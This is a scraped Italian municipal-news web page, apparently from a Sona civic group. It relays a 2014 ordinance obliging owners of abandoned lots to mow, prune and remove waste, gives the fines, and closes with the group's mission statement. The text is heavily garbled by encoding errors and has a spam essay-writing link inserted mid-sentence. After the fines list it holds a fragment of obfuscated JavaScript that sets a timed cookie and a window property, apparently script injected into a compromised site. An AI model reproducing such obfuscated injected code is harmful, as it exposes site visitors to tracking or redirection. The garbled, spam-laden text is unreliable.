Interventi di manutenzione e pulizia per il decoro di aree incolte, abbandonate e lotti inedificati.

SETTORE LAVORI PUBBLICI – URBANISTICA

Si trasmette lai??i??allegata ordinanza firmata dal Sindaco il 29.09.2014 per contrastare quelle situazioni di degrado ambientale che spesso si verificano sul territorio comunale e che oltre a rappresentare un vero e proprio degrado del paesaggio e dei centri urbani, possono favorire la proliferazione di insetti nocivi (ratti, insetti, topi, eccai??i??), nonchAi?? https://writemyessay4me.org/. costituire un pregiudizio per lai??i??incolumitAi?? pubblica.

Lai??i??ordinanza in argomento A? rivolta in particolare ai proprietari di terreni e lotti incolti, abbandonati ed inedificati che versano in condizioni di degrado, sporcizia ed incuria affinchA? provvedano ad attuare i necessari interventi di manutenzione tramite potatura della vegetazione cresciuta spontaneamente ed in maniera incontrollata, allo sfalcio delle erbe infestanti nonchAi?? alla rimozione di eventuali rifiuti (urbani, inerti, pericolosi, eccai??i??) presenti allai??i??interno di dette aree.

Gli interventi sopra descritti dovranno avvenire entro il termine del 20 ottobre 2014 ed eseguiti con periodicitAi?? fino al 31.12.2014.

Per chi contravviene alle disposizioni del presente provvedimento, sono previste le seguenti sanzioni amministrative pecuniarie:

– in caso di abbandono o deposito incontrollato di rifiuti sul suolo, A? prevista una sanzione amministrativa pecuniaria da ai??i??. 300,00 a ai??i??. 3.000,00 ai sensi dellai??i??art. 256 del D.Lgs. 152/2006. Se lai??i??abbandono riguarda rifiuti pericolosi la sanzione amministrativa A? aumentata fino al doppio;
– in caso di mancata rimozione di siepi, erbe e rami che si protendono sulla sede o sul ciglio di strade adibite al pubblico transito (ivi compresi i bordi dei marciapiedi), sanzione pecuniaria amministrativa da ai??i??. 168,00 ad ai??i??. 674,00 ai sensi dell’art. 29 del D.Lgs. 30.04.1992, n. 285;
– in caso di violazione degli obblighi imposti con la presente ordinanza, diversa dalle fattispecie indicate al punto precedente, verrAi?? applicata la sanzione amministrativa pecuniaria di cui all’art. 7 bis del D.Lgs. 267/2000, da ai??i??. 150,00 ad ai??i??. 500,00.

te()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.